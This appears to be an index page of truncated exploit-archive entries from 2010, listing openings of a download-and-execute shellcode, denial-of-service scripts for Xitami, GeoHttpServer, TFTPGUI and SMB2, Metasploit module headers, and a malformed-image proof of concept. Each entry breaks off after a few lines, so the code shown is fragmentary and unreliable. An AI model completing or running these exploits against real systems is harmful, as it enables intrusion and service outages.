Application: Microsoft Outlook Express Microsoft Windows Mail Platforms: Windows 2000 Windows XP Windows Vista Windows server 2003 Windows Server 2008 SR2 Exploitation: Remote Exploitable CVE Number: CVE-2010-0816 Discover Date: 2009-09-11 Author: F
Exploit Title winxp sp2 fr download exec :: Date 06/5/2010 Author : Crack_MaN :: code: ;------------------------------------------- .586 .model flat,stdcall option casemap:none include windows.inc include user32.inc include kernel32.inc include shel
================================ Xitami / 5.0a0 Denial Of Service ================================ ########################################################################################### # # Name : Xitami/5.0a0 Denial Of Service # Author: Usman S
### ## This file is part of the Metasploit Framework and may be subject to ## redistribution and commercial restrictions. Please see the Metasploit ## Framework web site for more information on licensing and terms of use. ## http://metasploit.com/fr
#!/usr/bin/perl # Exploit Title: GeoHttpServer remote DoS # Date: 7-5-2010 # Author: aviho1 # vendor: GeoVision # Version: all #info: the password recovery page does not properly validate user-supplied password ,causing a dos. use IO::Socket; my $ho
====================================================== TFTPGUI v1.4.5 Long Transport Mode Overflow DoS (Meta) ====================================================== # Title: TFTPGUI v1.4.5 Long Transport Mode Overflow # EDB-ID: 12482 # CVE-ID: () # O
import socket,sys,timeprint Maliformed negotiate protocol response and quickly closing the connection causes Windows machines supporting SMB2 to crash.print Written by Jelmer de Henprint Published at http://h.ackack.net/?p=387smb = socket.socket(soc
### $Id: openx_banner_edit.rb 9247 2010-05-08 03:07:51Z jduck $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information
### $Id: jboss_deploymentfilerepository.rb 9246 2010-05-07 22:28:37Z jduck $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more
### $Id: agentxpp_receive_agentx.rb 9236 2010-05-06 00:19:20Z swtornio $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more inf
# Date: 2010-05-04 # Version: 5.1.2600.2180 # Tested on: Windows XP SP2 Windows XP SP3 ENG #!/usr/bin/perl $PoC = xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x01x01x00x60. x00x60x00x00xFFxE1x00x16x45x78x69x66x00x00x49x49. x2